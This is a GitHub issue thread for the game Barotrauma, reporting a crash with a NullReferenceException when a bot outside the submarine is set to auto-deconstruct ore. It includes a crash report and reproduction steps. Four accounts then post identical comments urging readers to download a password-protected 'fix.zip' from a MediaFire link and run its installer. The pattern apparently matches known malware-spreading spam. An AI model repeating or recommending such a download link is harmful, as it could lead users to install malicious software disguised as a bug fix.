### ISSUE TITLE
Auto-deconstruct on a bot outside the sub with deconstruct command causes a crash

### ISSUE THREAD

**Issue by Regalis11** [FakeFishGames/Barotrauma#14507]
### Discussed in https://github.com/FakeFishGames/Barotrauma/discussions/14506

<div type='discussions-op-text'>

<sup>Originally posted by **NovaStar987** August 26, 2024</sup>
### Disclaimers

- [X] I have searched the issue tracker to check if the issue has already been reported.
- [ ] My issue happened while using mods.

### What happened?

I found a highly annoying bug regarding the deconstruct command, while in singleplayer.

Basically, I have a mechanic with the deconstructor command in its bot command. When I context-middleclick an ore in its inventory while it's outside the sub (has a standard headset), and have it set to deconstruct, then I switch to a crew inside the sub, a fatal crash happens.

It's extremely annoying, since I want to have the bot return to the sub after a mining trip, and have all the ore it has in its inventory to be auto-decontructed without input. The fact that this causes a crash is incredibly annoying. 

Here is the crash report:
Barotrauma Client crash report (generated on 08/25/2024 19:28:27)

Barotrauma seems to have crashed. Sorry for the inconvenience! 

5792BDC51AE8D05CEFA1095C8A6F95BD

Game version 1.5.9.1 (ReleaseWindows, branch release/summer-update-hotfix-2, revision bedd89e25a)
Graphics mode: 1920x1080 (BorderlessWindowed)
VSync ON
Language: English
Selected content packages: Vanilla (D0E3825), Explorer (11E7AFA)
Level seed: LocationName.generic.54113LocationName.city.54124
Loaded submarine: Explorer I (C2686AE0074052237CAF351579540C20)
Selected screen: Barotrauma.GameScreen
SteamManager initialized

System info:
    Operating system: Microsoft Windows NT 10.0.19045.0 64 bit
    GPU name: NVIDIA Quadro M2200
    Display mode: {Width:1920 Height:1080 Format:Color AspectRatio:1.7777778}
    GPU status: Normal

Exception: Object reference not set to an instance of an object. (System.NullReferenceException)
Target site: Boolean IsValidTarget(Barotrauma.Item)
Stack trace: 
   at Barotrauma.AIObjectiveDeconstructItems.IsValidTarget(Item target) in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Characters\AI\Objectives\AIObjectiveDeconstructItems.cs:line 64
   at Barotrauma.AIObjectiveLoop`1.FindTargets() in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Characters\AI\Objectives\AIObjectiveLoop.cs:line 203
   at Barotrauma.AIObjectiveLoop`1.UpdateTargets() in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Characters\AI\Objectives\AIObjectiveLoop.cs:line 189
   at Barotrauma.AIObjectiveLoop`1.Update(Single deltaTime) in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Characters\AI\Objectives\AIObjectiveLoop.cs:line 97
   at Barotrauma.AIObjectiveManager.UpdateObjectives(Single deltaTime) in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Characters\AI\Objectives\AIObjectiveManager.cs:line 289
   at Barotrauma.HumanAIController.Update(Single deltaTime) in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Characters\AI\HumanAIController.cs:line 394
   at Barotrauma.Character.UpdateAll(Single deltaTime, Camera cam) in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Characters\Character.cs:line 3305
   at Barotrauma.GameScreen.Update(Double deltaTime) in <DEV>\Barotrauma\BarotraumaShared\SharedSource\Screens\GameScreen.cs:line 185
   at Barotrauma.GameMain.Update(GameTime gameTime) in <DEV>\Barotrauma\BarotraumaClient\ClientSource\GameMain.cs:line 942
   at Microsoft.Xna.Framework.Game.DoUpdate(GameTime gameTime) in <DEV>\Libraries\MonoGame.Framework\Src\MonoGame.Framework\Game.cs:line 656
   at Microsoft.Xna.Framework.Game.Tick() in <DEV>\Libraries\MonoGame.Framework\Src\MonoGame.Framework\Game.cs:line 500
   at Microsoft.Xna.Framework.SdlGamePlatform.RunLoop() in <DEV>\Libraries\MonoGame.Framework\Src\MonoGame.Framework\SDL\SDLGamePlatform.cs:line 93
   at Microsoft.Xna.Framework.Game.Run(GameRunBehavior runBehavior) in <DEV>\Libraries\MonoGame.Framework\Src\MonoGame.Framework\Game.cs:line 397
   at Microsoft.Xna.Framework.Game.Run() in <DEV>\Libraries\MonoGame.Framework\Src\MonoGame.Framework\Game.cs:line 367
   at Barotrauma.Program.Main(String[] args) in <DEV>\Barotrauma\BarotraumaClient\ClientSource\Program.cs:line 61

Last debug messages:
[08/25/2024 19:19:53] Generating an outpost for the end of the level... (Location: Uusi-Turcu Facility, level type: LocationConnection)
[08/25/2024 19:19:53] Generating an outpost for the start of the level... (Location: Kerlescan Fossa Habitation Outpost, level type: LocationConnection)
[08/25/2024 19:19:52] Level identifier: coldcavernsadvanced
[08/25/2024 19:19:36] Result "UnexpectedError" was not handled by "UnlockAchievements".
[08/25/2024 19:04:43] Generating an outpost for the end of the level... (Location: Uusi-Turcu Facility, level type: LocationConnection)
[08/25/2024 19:04:42] Generating an outpost for the start of the level... (Location: Kerlescan Fossa Habitation Outpost, level type: LocationConnection)
[08/25/2024 19:04:41] Level identifier: coldcavernsadvanced
[08/25/2024 19:04:06] Attempting to open ALC device "OpenAL Soft on Headset Earphone (Corsair VOID ELITE USB Gaming Headset)"
[08/25/2024 19:04:04] Logged in as Nhovah (SteamID STEAM_1:0:430407408)

### Reproduction steps

1) Have a bot with the deconstruct command.
2) Have that bot hold ore outside the sub. The bot should have a headset, but I am uncertain if this is relevant to the crash.
3) Direct control the bot, and use context-middleclick to mark ore for deconstruction.
4) Switch to another character inside the sub (like the captain).
5) Crash.

### Bug prevalence

Happens every time I play

### Single player or multiplayer?

Single player

### Version

v1.5.9.1 (Summer Update Hotfix 2)

### Which operating system did you encounter this bug on?

Windows

### Relevant error messages and crash reports

_No response_</div>

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Rokvach** [comment]
Tested, working correctly. Can be merged and closed.
